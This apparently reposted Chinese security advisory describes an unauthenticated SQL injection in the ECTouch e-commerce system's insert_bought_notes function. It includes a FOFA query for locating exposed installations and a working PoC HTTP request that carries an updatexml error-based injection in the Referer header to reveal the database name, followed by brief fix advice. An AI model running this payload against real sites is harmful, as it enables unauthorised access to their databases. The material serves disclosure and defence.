
ECTouch 电商微信小程序 SQL注入漏洞



0x01 产品简介

ECTouch是一款开源的电商系统,为中小企业提供最佳的新零售解决方案

0x02 漏洞概述

ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL 注入,获取数据库敏感信息。


0x03 复现环境

FOFA:"themes/default/statics/css/ectouch.css"


0x04 漏洞复现

PoC
GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}
查询当前数据库


0x05 修复建议

关闭互联网暴露面或部署WAF防护
对 Referer 参数值进行SQL关键字过滤
文章来源:OidBoy_G

如果我们的文章对你有帮助,就把我们“设为星标”吧!
↓↓↓
3秒加星标,这样就不容易错过文章推送啦!


往期回顾

请长按下方图片
识别二维码 关注河北镌远
为客户创造价值
与客户共同成长



